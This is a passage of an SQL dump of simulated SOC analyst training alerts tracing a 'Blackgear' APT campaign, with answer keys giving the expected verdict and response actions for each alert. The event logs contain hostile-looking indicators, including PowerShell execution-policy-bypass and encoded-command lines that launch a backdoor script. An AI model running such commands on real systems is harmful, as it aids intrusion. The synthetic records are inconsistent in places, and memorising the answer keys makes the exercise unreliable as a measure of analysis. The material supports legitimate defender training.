aerospace.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_hash_registry\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash, but involved in suspicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"Employee associated with the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.860Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:05:32Z\\\",\\\"event_id\\\":\\\"DLP123456\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"classified_defense_project_v2.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"bytes_transferred\\\":10485760,\\\"dlp_policy\\\":\\\"Sensitive Data Movement\\\",\\\"dlp_rule\\\":\\\"Defense & Aerospace Keywords\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1136, 'Suspicious Blog Activity Detected', 'high', 'Web Traffic Logs', 'Initial Access operation detected through suspicious activity on high-traffic blogs. Analysts noticed unusual requests from known vulnerable blog platforms, signaling Blackgear\'s attempt to infiltrate Taiwan\'s digital landscape.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"request_url\":\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\",\"malware_hash\":\"a9b8c4d8e5f67a8b9cdef12345678901\",\"username\":\"admin\",\"referrer\":\"http://malicious-site.com\",\"status_code\":200}', '2026-02-01 14:02:14', '2026-02-23 20:09:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Blackgear APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by external threat.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"URL linked to recent exploit attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9b8c4d8e5f67a8b9cdef12345678901\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known Blackgear malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Authentication Logs\",\"verdict\":\"internal\",\"details\":\"Common username targeted for exploitation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:31:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:30:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:29:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"},{\"timestamp\":\"2026-02-01T20:28:22.861Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"request_url\\\":\\\"http://vulnerable-blog.com/wp-content/plugins/exploit.php\\\",\\\"malware_hash\\\":\\\"a9b8c4d8e5f67a8b9cdef12345678901\\\",\\\"username\\\":\\\"admin\\\",\\\"referrer\\\":\\\"http://malicious-site.com\\\",\\\"status_code\\\":200}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1137, 'Protux Backdoor Execution Attempt', 'high', 'Endpoint Detection and Response (EDR)', 'Following an established initial access, the Blackgear group attempts to execute the Protux backdoor to maintain persistent access to compromised government systems.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:32:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.20.30.40\",\"destination_port\":5985,\"protocol\":\"TCP\",\"username\":\"j.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -NoProfile -File C:\\\\Windows\\\\Temp\\\\protux.ps1\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"filename\":\"protux.ps1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"event_id\":4624,\"event_type\":\"Logon\",\"logon_type\":3,\"logon_process\":\"NtLmSsp\",\"domain\":\"government.local\"}', '2026-02-01 14:02:14', '2026-02-23 20:11:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with Blackgear group activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal government network IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareRepository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to Protux backdoor script\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"protux.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileAnalysisService\",\"verdict\":\"malicious\",\"details\":\"Known malicious script for Protux backdoor installation\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1138, 'Backdoor Persistence Mechanism Identified', 'high', 'File Integrity Monitoring', 'The operation escalates as analysts identify persistence mechanisms employed by the Protux backdoor, designed to survive system reboots and evade detection. A suspicious file was detected which indicates a possible persistence mechanism used by the Protux malware.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T03:21:45Z\",\"event_id\":\"FIM-20231014-0045\",\"src_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.5\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"file_hash\":\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\",\"username\":\"admin\",\"action\":\"File Created\",\"description\":\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\"}', '2026-02-01 14:02:14', '2026-02-23 20:12:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_lookup\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Protux backdoor activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash matches known Protux backdoor sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"system_scan\",\"verdict\":\"suspicious\",\"details\":\"Unexpected file creation in a critical system directory.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_lookup\",\"verdict\":\"internal\",\"details\":\"Privileged user account involved.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.864Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T03:21:45Z\\\",\\\"event_id\\\":\\\"FIM-20231014-0045\\\",\\\"src_ip\\\":\\\"192.168.1.45\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"file_hash\\\":\\\"a34f8b9a5c1d4e7a8f9e2b4c6d5f8a7b\\\",\\\"username\\\":\\\"admin\\\",\\\"action\\\":\\\"File Created\\\",\\\"description\\\":\\\"Suspicious file creation detected in System32 directory, potentially related to persistence mechanism of Protux backdoor.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1139, 'Lateral Movement via Credential Dumping', 'critical', 'Network Traffic Analysis', 'Blackgear APT group is leveraging stolen credentials to move laterally within the telecommunications infrastructure, targeting sensitive systems to expand their network access.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"10.0.5.34\",\"destination_ip\":\"192.168.14.76\",\"attacker_ip\":\"203.0.113.45\",\"user_account\":\"jdoe_admin\",\"malware_hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"filename\":\"lsass_dump.dmp\",\"event\":\"Credential Dumping Detected\",\"protocol\":\"SMB\",\"action\":\"Attempted Lateral Movement\"}', '2026-02-01 14:02:14', '2026-02-16 12:26:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP known to be associated with Blackgear APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.14.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal server targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known credential dumping malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Compromised administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1140, 'Data Exfiltration to External Servers', 'critical', 'Data Loss Prevention (DLP) Systems', 'The culmination of Blackgear\'s campaign sees them attempting to exfiltrate valuable intelligence, using encrypted channels to obscure their tracks. Analysts must act swiftly to prevent data loss and mitigate the impact.', 'Exfiltration', 'T1048', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:22:34Z\",\"event_id\":\"exfiltration_12345\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"1.2 GB\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\",\"user\":\"jdoe\",\"action\":\"data_transfer\",\"encryption_used\":true,\"alert\":true}', '2026-02-01 14:02:14', '2026-02-16 17:47:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Blackgear APT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file potentially exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File hash identified in exfiltration attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 GB\\\",\\\"file_name\\\":\\\"confidential_report.pdf\\\",\\\"file_hash\\\":\\\"3e7a1f85b1d4f6c2e4a77f7e9a9f4c3b\\\",\\\"user\\\":\\\"jdoe\\\",\\\"action\\\":\\\"data_transfer\\\",\\\"encryption_used\\\":true,\\\"alert\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.867Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:22:34Z\\\",\\\"event_id\\\":\\\"exfiltration_12345\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_volume\\\":\\\"1.2 